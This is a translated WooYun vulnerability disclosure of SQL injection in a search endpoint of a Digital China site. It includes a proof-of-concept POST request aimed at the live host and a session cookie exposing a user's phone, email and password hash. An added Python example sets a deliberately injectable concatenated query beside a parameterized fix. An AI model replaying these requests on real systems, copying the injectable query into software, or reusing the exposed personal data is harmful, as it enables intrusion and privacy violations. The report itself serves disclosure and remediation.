Vulnerability summary

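Bug ID: wooyun-2015-0148308

Title: SQL injection in a Digital China management system (root privileges)

Vendor: digitalchina.com

Author: Focusstart

Submitted: 2015-10-21 12:12

Fixed: 2015-12-05 16:30

Public disclosure: 2015-12-05 16:30

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor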

Source: http://www.wooyun.org

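Vulnerability details

Disclosure status:

2015-10-21: Details sent to the vendor, awaiting vendor handling
2015-10-21: Vendor confirmed; details disclosed to the vendor only
2015-10-31: Details disclosed to core white hats and experts in related fields
2015-11-10: Details disclosed to regular white hats
2015-11-20: Details disclosed to trainee white hats
2015-12-05: Details disclosed to the public

Brief description:

SQL injection in a Digital China management system (root privileges)
Professional picker-up of leftover bugs for 100 years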

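Detailed description:

I saw a publicly disclosed vulnerability on the home page,
so I registered an account to test it.
The search function has a SQL injection.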

Proof of vulnerability:

A single quote immediately triggers an error.

POST /index.php/zebra/clist HTTP/1.1
Host: dckf.digitalchina.com
Proxy-Connection: keep-alive
Content-Length: 57
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://dckf.digitalchina.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://dckf.digitalchina.com/index.php/point/main
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ci_session=a%3A26%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22dc677916780140e655164067defe9748%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%2258.20.51.228%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A108%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F31.0.1650.63+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1445398019%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A3%3A%22891%22%3Bs%3A8%3A%22username%22%3Bs%3A10%3A%22helloworld%22%3Bs%3A8%3A%22realname%22%3Bs%3A6%3A%22%E8%8A%B1%E7%BA%B9%22%3Bs%3A8%3A%22password%22%3Bs%3A16%3A%22a7830e88a5e70fd6%22%3Bs%3A8%3A%22authcode%22%3Bs%3A32%3A%22a448949445b9a2f3d60265cb38456a53%22%3Bs%3A7%3A%22company%22%3Bs%3A18%3A%22%E6%B5%8B%E8%AF%95%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8%22%3Bs%3A4%3A%22sign%22%3Bs%3A6%3A%22%E6%B5%8B%E8%AF%95%22%3Bs%3A7%3A%22address%22%3Bs%3A11%3A%22%E6%B5%8B%E8%AF%9511122%22%3Bs%3A4%3A%22area%22%3BN%3Bs%3A2%3A%22pc%22%3Bs%3A0%3A%22%22%3Bs%3A3%3A%22tel%22%3Bs%3A11%3A%2213574041235%22%3Bs%3A3%3A%22fax%22%3Bs%3A12%3A%22073188811111%22%3Bs%3A5%3A%22email%22%3Bs%3A21%3A%22guo_shao_ming%40126.com%22%3Bs%3A6%3A%22regday%22%3Bs%3A19%3A%222015-10-21+11%3A17%3A53%22%3Bs%3A5%3A%22pplan%22%3Bs%3A1%3A%221%22%3Bs%3A6%3A%22ppoint%22%3Bs%3A1%3A%221%22%3Bs%3A6%3A%22paduit%22%3BN%3Bs%3A8%3A%22pcorrect%22%3BN%3Bs%3A6%3A%22pquery%22%3BN%3Bs%3A6%3A%22padmin%22%3BN%3Bs%3A4%3A%22demo%22%3BN%3B%7De9fa90726b499d543d748af72de4851e

sdate=2015-10-01&edate=2015-10-01&rma=a%27&sn=a%27&state=


Both the rma and sn parameters are injectable.


Fix:

Filtering
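
A hardened form of the search handler described in this report, as an added example that is not code from the report or the vendor: it uses bound parameters rather than input filtering for the `sdate`, `edate`, `rma`, `sn` and `state` form fields. The table, its columns, the sample rows and the function names are assumptions, and SQLite stands in for the MySQL backend.

```python
import re
import sqlite3

DATE_RE = re.compile(r"\d{4}-\d{2}-\d{2}")

def make_db():
    # Constructed sample data; the real table and column names are not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE repairs (rma TEXT, sn TEXT, state TEXT, created TEXT)")
    db.executemany("INSERT INTO repairs VALUES (?, ?, ?, ?)", [
        ("RMA1001", "SN-A1", "open", "2015-10-01"),
        ("RMA1002", "SN-B2", "closed", "2015-10-01"),
        ("O'Neil-7", "SN-C3", "open", "2015-10-02"),
    ])
    return db

def search_concat(db, form):
    """'Before': request values are pasted into the SQL text."""
    sql = ("SELECT rma, sn FROM repairs WHERE rma LIKE '%" + form["rma"] +
           "%' AND sn LIKE '%" + form["sn"] + "%'")
    return db.execute(sql).fetchall()

def search_bound(db, form):
    """'After': fixed SQL text, every request value passed as a bound parameter."""
    clauses, args = [], []
    for field, op in (("sdate", ">="), ("edate", "<=")):
        if form.get(field):
            # Dates have a known shape, so reject anything else outright.
            if not DATE_RE.fullmatch(form[field]):
                raise ValueError("bad date in " + field)
            clauses.append("created " + op + " ?")
            args.append(form[field])
    for col in ("rma", "sn"):  # column names come from this tuple, never from input
        if form.get(col):
            # Escape LIKE wildcards so user text is matched literally.
            literal = re.sub(r"([\\%_])", r"\\\1", form[col])
            clauses.append(col + " LIKE ? ESCAPE '\\'")
            args.append("%" + literal + "%")
    if form.get("state"):
        clauses.append("state = ?")
        args.append(form["state"])
    sql = "SELECT rma, sn FROM repairs"
    if clauses:
        sql += " WHERE " + " AND ".join(clauses)
    return db.execute(sql + " ORDER BY rma", args).fetchall()
```

With the form values from the request above, `search_concat` fails with a database syntax error, while `search_bound` treats the quote as data and returns an empty result.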

Copyright notice: when reposting, please credit the source Focusstart@WooYun


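Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-10-21 16:28

Vendor reply:

Will handle it as soon as possible, thanks

Latest status:

None yet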

